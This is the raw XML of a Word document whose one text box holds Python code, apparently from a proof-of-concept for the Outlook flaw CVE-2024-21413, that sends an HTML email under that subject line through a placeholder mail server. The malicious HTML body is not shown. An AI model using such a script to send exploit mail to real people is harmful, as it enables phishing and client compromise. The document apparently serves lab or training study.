    <w:p w14:paraId="7F7E0704" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="5166D8BA" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="04393373" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="7E3CF613" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="75330527" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="2816CF6F" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="1631D857" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="26E71A3E" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="48D5F9F8" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="58B199D9" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="2193E149" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRPr="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="5F33BCCC" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="23B93AA1" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="03CE47C2" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="6A47F17A" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="77E22F7F" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="63CF5A97" w14:textId="77777777" w:rsidR="00FF292C" w:rsidRDefault="00FF292C" w:rsidP="00FF292C"/>
    <w:p w14:paraId="58E166BC" w14:textId="54496A84" w:rsidR="00FF292C" w:rsidRDefault="00631FBB" w:rsidP="00FF292C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F8829FA" wp14:editId="447F6DD7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>175260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5090160" cy="7139940"/>
                <wp:effectExtent l="0" t="0" r="15240" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1176663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160" cy="7139940"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7172C4F6" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>message['Subject'] = "CVE-2024-21413"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AFB0B59" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">message["From"] = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>formataddr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>(('</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>CMNatic</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">', </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>sender_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>))</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6BEF4A71" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">message["To"] = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>receiver_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="5607CD95" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                          <w:p w14:paraId="0466A2C7" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t># Convert the HTML string into bytes and attach it to the message object</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="707F5101" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>msgHtml</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve"> = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>MIMEText</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>html_content,'html</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>')</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5F5393B7" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>message.attach</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>msgHtml</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2456B32A" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                          <w:p w14:paraId="2D242A60" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">server = </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>smtplib.SMTP</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>('MAILSERVER', 25)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5F7A6FBA" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>server.ehlo</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="771D1E04" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>try:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="33156B6D" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>server.login</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>sender_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>, password)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="57C704B2" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>except Exception as err:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="090C012D" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    print(err)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2C95CD07" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    exit(-1)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="09E7496E" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                          <w:p w14:paraId="08F8CA2B" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>try:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B7098DB" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>server.sendmail</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>sender_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>, [</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>receiver_email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">], </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>message.as_string</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>())</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39A4DD1B" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    print("\n Email delivered")</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="04C31C98" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>except Exception as error:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C2CA725" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    print(error)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="68150B8F" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t>finally:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A6953FB" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                            <w:r w:rsidRPr="00050A96">
                              <w:t xml:space="preserve">    </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>server.quit</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00050A96">
                              <w:t>()</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="00E25D51" w14:textId="3154B6BA" w:rsidR="00631FBB" w:rsidRDefault="00631F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829FA" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:13.8pt;margin-top:0;width:400.8pt;height:562.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7172C4F6" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>message['Subject'] = "CVE-2024-21413"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AFB0B59" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">message["From"] = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>formataddr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>(('</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>CMNatic</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">', </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>sender_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>))</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6BEF4A71" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">message["To"] = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>receiver_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="5607CD95" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                    <w:p w14:paraId="0466A2C7" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t># Convert the HTML string into bytes and attach it to the message object</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="707F5101" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>msgHtml</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve"> = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>MIMEText</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>html_content,'html</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>')</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5F5393B7" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>message.attach</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>msgHtml</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2456B32A" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                    <w:p w14:paraId="2D242A60" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">server = </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>smtplib.SMTP</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>('MAILSERVER', 25)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5F7A6FBA" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>server.ehlo</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="771D1E04" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>try:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="33156B6D" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>server.login</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>sender_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>, password)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="57C704B2" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>except Exception as err:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="090C012D" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    print(err)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2C95CD07" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    exit(-1)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="09E7496E" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96"/>
                    <w:p w14:paraId="08F8CA2B" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>try:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B7098DB" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>server.sendmail</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>sender_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>, [</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>receiver_email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">], </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>message.as_string</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>())</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39A4DD1B" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    print("\n Email delivered")</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="04C31C98" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>except Exception as error:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C2CA725" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    print(error)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="68150B8F" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t>finally:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A6953FB" w14:textId="77777777" w:rsidR="00050A96" w:rsidRPr="00050A96" w:rsidRDefault="00050A96" w:rsidP="00050A96">
                      <w:r w:rsidRPr="00050A96">
                        <w:t xml:space="preserve">    </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>server.quit</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00050A96">
                        <w:t>()</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="00E25D51" w14:textId="3154B6BA" w:rsidR="00631FBB" w:rsidRDefault="00631FBB"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E463B0D" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="6327EFE2" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="1309BB3E" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="5ADE7CC7" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="6D83BFF4" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="14CF6796" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="0089DCC0" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="7802BC89" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="7103044E" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="0D694105" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="2AD5F199" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="2A1D69F4" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="6BB3E9AC" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="6EC38BEA" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="249AA302" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="65ECC541" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="1D3CCE7F" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="35D0EAC0" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="3BAB83C2" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="69F5DE00" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="319A3A49" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
    <w:p w14:paraId="0D7F7FCC" w14:textId="77777777" w:rsidR="00304941" w:rsidRPr="00304941" w:rsidRDefault="00304941" w:rsidP="00304941"/>
